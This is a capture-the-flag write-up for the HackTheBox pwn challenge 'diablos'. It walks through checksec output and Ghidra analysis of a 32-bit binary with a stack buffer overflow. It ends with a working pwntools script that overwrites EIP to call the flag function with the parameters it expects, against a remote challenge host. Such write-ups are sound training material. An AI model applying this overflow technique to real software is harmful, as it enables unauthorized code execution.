this is a 32 bit binary not stripped which will make reversing this binary easier since the function names will not be obfuscated, the binary has no protections
┌──(kali㉿kali)-[~/hackthebox/pwn/diablos]
└─$ file vuln
vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=ab7f19bb67c16ae453d4959fba4e6841d930a6dd, for GNU/Linux 3.2.0, not stripped
┌──(kali㉿kali)-[~/hackthebox/pwn/diablos]
└─$ checksec --file=vuln
[*] '/home/kali/hackthebox/pwn/diablos/vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
let's open the binary using ghidra
we have 3 function
the main function is not vulnerable but the vuln function is clearly vulnerable to BOF since it doesn't check the size of the input given by the user
and flag function is the win function but it has parameters which are compared to hex values and if the comparaison is true it will print the flag.txt file output
so we will overflow the buffer and overwrite the EIP with the address of the flag function and overwrite the flag function parameters with correct values, since this is 32 bit archeticture binary the function parameters are bove the Return Pointer
Find Offset to EIP :
we can find it using gdb or just using ghidra by calculating the offset between the return and vunerable local variable
so the offset is 188 (0xbc -> 188)
Exploit :
from pwn import *
# Set up pwntools for the correct architecture
exe = './vuln'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'debug'
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# io = process(exe)
io = remote('83.136.249.57', 47937)
offset = 188 # offset to EIP
payload = flat(
offset * b'A',
elf.functions.flag,
0, # Return Pointer
-0x21524111, #param1
-0x3f212ff3 #param2
)
io.sendline(payload)
io.interactive()
